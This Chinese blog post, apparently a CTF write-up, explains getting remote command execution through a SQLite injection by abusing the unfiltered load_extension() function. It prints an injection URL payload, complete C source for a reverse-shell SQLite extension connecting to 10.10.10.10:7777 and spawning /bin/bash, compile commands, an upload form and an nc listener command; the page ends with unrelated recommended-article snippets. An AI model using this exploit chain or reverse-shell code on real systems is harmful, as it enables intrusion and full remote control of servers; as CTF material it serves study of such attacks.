CTF之SQL注入之load_extension函数

最新推荐文章于 2023-09-19 16:05:23 发布
最新推荐文章于 2023-09-19 16:05:23 发布
阅读量2.4k 收藏 4
点赞数 3
分类专栏: 安全 文章标签: CTF SQL注入 load_extension 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/109250435
版权

某次ctf比赛时,发现前台存在sql注入,使用的是sqlite数据库,通过报错信息,发现过滤了select、or、and、insert等关键字,但是没有禁止load_extension() 函数

于是可以通过如下方式加载动态库,如windows的dll,linux的so进行远程命令执行,方式如下:

www.abc.com?id=1'||load_extension('/home/poc.so');--

刚好目标网站有一个文件上传接口,可以自己编写动态库,然后上传上去。

从sqlite的官网上,我找到了一个例子:
在这里插入图片描述
load_extension的默认初始化函数不是c语言的main函数,而是sqlite3_extension_init函数,于是我把c语言的反弹shell 写进该函数里面:

/* Add your header comment here */
#include <sqlite3ext.h> /* Do not use <sqlite3.h>! */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <signal.h>
#include <dirent.h>
#include <sys/stat.h>
SQLITE_EXTENSION_INIT1

/* Insert your extension code here */
int tcp_port = 7777;
char *ip = "10.10.10.10";

#ifdef _WIN32
__declspec(dllexport)
#endif

int sqlite3_extension_init(
  sqlite3 *db, 
  char **pzErrMsg, 
  const sqlite3_api_routines *pApi
){
  int rc = SQLITE_OK;
  SQLITE_EXTENSION_INIT2(pApi);
  
  int fd;
  if ( fork() <= 0){
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(tcp_port);
    addr.sin_addr.s_addr = inet_addr(ip);

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if ( connect(fd, (struct sockaddr*)&addr, sizeof(addr)) ){
            exit(0);
    }

    dup2(fd, 0);
    dup2(fd, 1);
    dup2(fd, 2);
    execve("/bin/bash", 0LL, 0LL);
}
  
  return rc;
}

然后放到ubuntu里面进行编译,编译前先安装sqlite环境:

sudo apt install libsqlite3-dev

然后编译

gcc -g -fPIC -shared YourCode.c -o YourCode.so

然后上传so文件,这里有一个坑,千万不要使用burpsuite的paste from file,否则编码会有问题,不知不觉的你以为是poc的问题,然后在那调poc调到怀疑人生。放一个我师父给我的丑陋的表单:

<script>
    function mysubmit(){
        var formData = new FormData();
        var fileSelect = document.getElementById("fileSelect");
        if(fileSelect.files && fileSelect.files.length == 1){
            var file = fileSelect.files[0];
            formData.set("file", file, file.name);
        }
        formData.set("name", file.name);
        formData.set("id", "5234j5lkj234bjk52h3452345");
        var request = new XMLHttpRequest();
        request.open("POST","http://www.baidu.com/");
        request.send(formData);
    }
</script>
<form>
    <input type="file" id="fileSelect" name ="someFile"/>
    <button type="button" οnclick="mysubmit()">submit</button>
</form>

选择文件,上传,然后在用burpsuite抓包,这个味道才最纯正。

调用load_extension函数前,启用nc监听:

nc -lvp 7777

调用,反弹成功,get flag。

再次,注意编码问题,奇坑。

5wimming
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
Android sqlite load_extension漏洞解析
weixin_33842304的博客
03-08 436
路人甲 · 2015/09/25 14:540x01 sqlite load_extensionSQLite从3.3.6版本(http://www.sqlite.org/cgi/src/artifact/71405a8f9fedc0c2)开始提供了支持扩展的能力,通过sqlite_load_extension API(或者load_extensionSQL语句),开发者可以在不改动SQLite源码...
SQLite运行时可加载扩展(三十五)
最新发布
04-21 1231
SQLite拥有别人无法比拟的装机量,究竟什么成就了SQLite呢,本文将SQLite的历史版本记录粗列一下,供各位朋友参详如何做一个高质量的程序的引文。SQLite拥有超过225个API,本系列文章将深入介绍 SQLite C/C++ 数据库接口的相关知识,包括如何连接和打开 SQLite 数据库、执行查询和事务管理、提取查询结果集等等,帮助开发者更好地了解和使用 SQLite 数据库接口。
vmlogin浏览器插件安装/浏览器最大化
vmlogin888的博客
10-26 399
vmlogin浏览器插件安装/浏览器最大化
Chrome浏览器启动命令行参数
wzj的博客
01-11 1万+
1 --allow-outdated-plugins 不停用过期的插件。 2 --allow-running-insecure-content 默认情况下,https 页面不允许从 http 链接引用 javascript/css/plug-ins。添加这一参数会放行这些内容。 3 --allow-scripting-gallery 允许拓展脚本在官方应用中心生效。默认情况下,出于安全因素考虑这些脚本都会被阻止。 4 --disable-desktop-notifications 禁用桌面通知,在 Wind
Chrome浏览器启动参数大全(命令行参数)
热门推荐
bigcarp的专栏
11-04 3万+
前言 在开发Web项目当中,浏览器必不可少,而浏览器的启动参数可以帮我们实现很多功能。 常用参数 常用参数请参考下表。 序号 参数 说明 1 --allow-outdated-plugins 不停用过期的插件。 2 --allow-running-insecure-content 默认情况下,https 页面不允许从 http 链接引用 javascript/css/plug-ins。添加这一参数会放行这些内容。 3 --allow-scri
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入攻击流量情况
07-18
sql注入攻击流量情况
CTFSQL注入常见题型整理.pdf
02-11
CTFSQL注入常见题型整理
SQL注入漏洞演示源代码
07-15
它会解释如何运行这个演示源代码,可能会描述一些关键的函数或方法,这些是实现SQL注入的关键部分。例如,它可能指出存在漏洞的查询是如何构建的,以及如何通过修改输入参数来触发注入。 接下来,"SQL注入漏洞实例...
playwright 使用本地chrome 浏览器 加载多个extension 插件
nongcunqq的博客
09-09 4202
【代码】playwright 使用本地chrome 浏览器。
关于 sqlite3.dll 动态加载使用问题
lxbin2003的专栏
09-19 609
sqlite3 动态加载
chrome浏览器 自动化 通过设置启动参数 实现动态切换代理
u014458504的博客
07-21 909
chrome浏览器 自动化 通过设置启动参数 实现动态切换代理 需要设置的启动参数: –load-extension=“D:\a\b\c” 需要准备的插件: Chrome-proxy-helper 额外的工作: 将插件压缩包解压到: D:\a\b\c 实现方式: 通过启动参数启动浏览器之后,在新标签页,输入快捷网址: chrome-extension://mnloefcpaepkpmhaoipjkpikbnkmbnic/popup.html?a=https&b=你的代理IP地址&c=你的代理
第一届暗泉杯 DNUICTF
qq_53263789的博客
02-09 2331
前言 加油!等wp出来再补全博客 flag 签到题目 ZmxhZ3tuc3NfbG9naW592 base64 odd_upload smarty模板 题目首页知道用到了smarty模板,同时可以上传文件 根据文档 https://www.smarty.net/docs/zh_CN/installing.smarty.basic.tpl 上传路径可控 向 /templates/ 传一个 index.tpl 来控制 index.php显示内容 接下来smarty注入,利用 if 标签 Easy
[HarekazeCTF2019]Sqlite Voting 13
m0_50967960的博客
04-29 260
根据题目,判断考察方向针对sqlite的sql注入 攻击点 $id $id被进行了很多过滤 姿势1 https://ch4ser-go.github.io/2020/01/21/sql-injection-sqlite3/ 姿势2 http://blog.redrocket.club/2019/05/19/harekaze-ctf-sqlite-voting/
buu-day05
anwen12的博客
01-03 693
0x01 [NPUCTF2020]验证???? str.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, '') 第一步是一个弱类型比较,下面有两个常用的比较方式 a[]=a&b[]=a a='1' &b=[1] 注意第二种方式必须使用json格式进行传输,不然[1]会被解析成为字符串。很显然这里使用第二种。 第二步就是研究上面这个正则表达式了。一共分为3个
攻防世界Web赛题记录
Bit0
10-13 2503
Cat 题目:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4658&page=2 Writeup: 攻防世界-web-Cat(XCTF 4th-WHCTF-2017)_Sea_Sand息禅-CSDN博客 攻防世界 | CAT - laolao - 博客园 [CTF题目总结-web篇]攻防世界:Cat_T2hunz1-CSDN博客 知识点: 1.输入字符 get传递在网址
SQLite注入记录(目前最全、核心函数用法、布尔盲注、时间盲注、webshell、动态库,绕过方式)
墨痕诉清风的博客
02-28 2371
为了方便开发者可以很轻便的扩展功能,SQLite 从 3.3.6 版本开始提供了支持扩展的能力,通过sqlite_load_extension API(或者 load_extension 函数 ),开发者可以在不改动 SQLite 源码的情况下,通过动态加载的库(so/dll/dylib)来扩展 SQLite 的能力。SQLite 的 ATTACH DATABASE 语句是用来选择一个特定的数据库,使用该命令后,所有的 SQLite 语句将在附加的数据库下执行。执行 payload 后将有一段时间的延时。
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作。 要进行SQL注入攻击,攻击者需要找到目标应用程序中存在注入漏洞的输入点,并通过构造恶意的SQL语句来利用这些漏洞。以下是一些常见的SQL注入技巧和防御措施: 1. 基于布尔盲注的SQL注入:攻击者通过构造恶意的SQL语句,并根据应用程序的不同响应来判断注入是否成功。 2. 基于错误的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的错误信息来获取有用的信息。 3. 基于时间延迟的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的时间延迟,从而获取有用的信息。 为了防止SQL注入攻击,开发人员可以采取以下措施: 1. 使用参数化查询或预编译语句来构建和执行SQL查询,而不是直接拼接用户输入到SQL语句中。 2. 对用户输入进行严格的验证和过滤,确保只接受预期的输入,并对输入进行适当的转义或编码。 3. 最小化应用程序的权限,限制数据库用户的权限,并使用最小化的特权来执行数据库查询。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值